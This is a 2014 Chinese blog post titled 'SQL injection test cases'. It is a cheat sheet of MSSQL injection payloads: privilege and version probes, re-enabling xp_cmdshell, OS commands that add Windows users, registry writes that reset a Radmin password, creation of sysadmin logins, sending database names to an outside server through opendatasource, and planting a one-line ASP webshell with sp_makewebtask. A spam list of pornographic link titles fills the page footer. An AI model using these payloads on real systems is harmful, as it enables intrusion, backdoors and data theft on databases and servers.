<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    qileilove

    blog已經(jīng)轉(zhuǎn)移至github,大家請(qǐng)?jiān)L問 http://qaseven.github.io/

    SQL注入測(cè)試用例

      //看看是什么權(quán)限的
      and 1=(Select IS_MEMBER('db_owner'))
      And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
      //檢測(cè)是否有讀取某數(shù)據(jù)庫的權(quán)限
      and 1= (Select HAS_DBACCESS('master'))
      And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
      數(shù)字類型
      and char(124)%2Buser%2Bchar(124)=0
      字符類型
      ' and char(124)%2Buser%2Bchar(124)=0 and ''='
      搜索類型
      ' and char(124)%2Buser%2Bchar(124)=0 and '%'='
      爆用戶名
      and user>0
      ' and user>0 and ''='
      檢測(cè)是否為SA權(quán)限
      and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
      And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
      檢測(cè)是不是MSSQL數(shù)據(jù)庫
      and exists (select * from sysobjects);--
      檢測(cè)是否支持多行
      ;declare @d int;--
      恢復(fù) xp_cmdshell
      ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
      select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
      //-----------------------
      //      執(zhí)行命令
      //-----------------------
      首先開啟沙盤模式:
      exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
      然后利用jet.oledb執(zhí)行系統(tǒng)命令
      select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
      執(zhí)行命令
      ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
      EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
      判斷xp_cmdshell擴(kuò)展存儲(chǔ)過程是否存在:
      http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
     寫注冊(cè)表
      exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
      REG_SZ
      讀注冊(cè)表
      exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
      讀取目錄內(nèi)容
      exec master..xp_dirtree 'c:\winnt\system32\',1,1
      數(shù)據(jù)庫備份
      backup database pubs to disk = 'c:\123.bak'
      //爆出長(zhǎng)度
      And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
      更改sa口令方法:用sql綜合利用工具連接后,執(zhí)行命令:
      exec sp_password NULL,'新密碼','sa'
      添加和刪除一個(gè)SA權(quán)限的用戶test:
      exec master.dbo.sp_addlogin test,ptlove
      exec master.dbo.sp_addsrvrolemember test,sysadmin
      刪除擴(kuò)展存儲(chǔ)過過程xp_cmdshell的語句:
      exec sp_dropextendedproc 'xp_cmdshell'
      添加擴(kuò)展存儲(chǔ)過過程
      EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
      GRANT exec On xp_proxiedadata TO public
      停掉或激活某個(gè)服務(wù)。
      exec master..xp_servicecontrol 'stop','schedule'
      exec master..xp_servicecontrol 'start','schedule'
      dbo.xp_subdirs
      只列某個(gè)目錄下的子目錄。
      xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
      dbo.xp_makecab
      將目標(biāo)多個(gè)檔案壓縮到某個(gè)目標(biāo)檔案之內(nèi)。
      所有要壓縮的檔案都可以接在參數(shù)列的最后方,以逗號(hào)隔開。
      dbo.xp_makecab
      'c:\test.cab','mszip',1,
      'C:\Inetpub\wwwroot\SQLInject\login.asp',
      'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
      xp_terminate_process
      停掉某個(gè)執(zhí)行中的程序,但賦予的參數(shù)是 Process ID。
      利用”工作管理員”,透過選單「檢視」-「選擇字段」勾選 pid,就可以看到每個(gè)執(zhí)行程序的 Process ID
      xp_terminate_process 2484
      xp_unpackcab
      解開壓縮檔。
      xp_unpackcab 'c:\test.cab','c:\temp',1
      某機(jī),安裝了radmin,密碼被修改了,regedit.exe不知道被刪除了還是被改名了,net.exe不存在,沒有辦法使用regedit /e 導(dǎo)入注冊(cè)文件,但是mssql是sa權(quán)限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 則端口值改為1234
      create database lcx;
      Create TABLE ku(name nvarchar(256) null);
      Create TABLE biao(id int NULL,name nvarchar(256) null);
      //得到數(shù)據(jù)庫名
      insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
      //在Master中創(chuàng)建表,看看權(quán)限怎樣
      Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
      用 sp_makewebtask直接在web目錄里寫入一句話?cǎi)R:
      http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
      //更新表內(nèi)容
      Update films SET kind = 'Dramatic' Where id = 123
      //刪除內(nèi)容
      delete from table_name where Stockid = 3

    posted on 2014-04-25 10:12 順其自然EVO 閱讀(446) 評(píng)論(0)  編輯  收藏


    只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。


    網(wǎng)站導(dǎo)航:
     
    <2014年4月>
    303112345
    6789101112
    13141516171819
    20212223242526
    27282930123
    45678910

    導(dǎo)航

    統(tǒng)計(jì)

    常用鏈接

    留言簿(55)

    隨筆分類

    隨筆檔案

    文章分類

    文章檔案

    搜索

    最新評(píng)論

    閱讀排行榜

    評(píng)論排行榜

    主站蜘蛛池模板: 亚洲另类古典武侠| 18pao国产成视频永久免费| 亚洲精品视频免费在线观看| 免费jjzz在线播放国产| 91香蕉国产线在线观看免费| 特黄aa级毛片免费视频播放| 91精品国产亚洲爽啪在线影院 | 免费成人黄色大片| 成人网站免费观看| 午夜免费啪视频在线观看| 免费看美女午夜大片| 亚洲欧美综合精品成人导航| 亚洲精品亚洲人成在线观看麻豆| 亚洲性猛交XXXX| 免费午夜爽爽爽WWW视频十八禁 | 亚洲一区二区三区乱码A| 黑人粗长大战亚洲女2021国产精品成人免费视频| 日本卡1卡2卡三卡免费| caoporm碰最新免费公开视频| 国产偷国产偷亚洲清高APP| 激情内射亚洲一区二区三区爱妻 | 亚洲人成免费网站| 免费h视频在线观看| 国产精品美女免费视频观看| 国产亚洲精品第一综合| 亚洲精品色播一区二区| 亚洲一区在线观看视频| 亚洲日产2021三区| 亚洲嫩草影院在线观看| 亚洲精品白色在线发布| 亚洲麻豆精品果冻传媒| 久久精品国产亚洲AV无码麻豆| 亚洲AV永久无码精品水牛影视| 亚洲日韩精品无码一区二区三区| 亚洲人成影院在线无码观看| 亚洲国产精品尤物YW在线观看| 亚洲AⅤ无码一区二区三区在线 | 久久久久亚洲AV片无码下载蜜桃| 亚洲国产综合91精品麻豆| 亚洲AV无码专区国产乱码电影| 久久亚洲一区二区|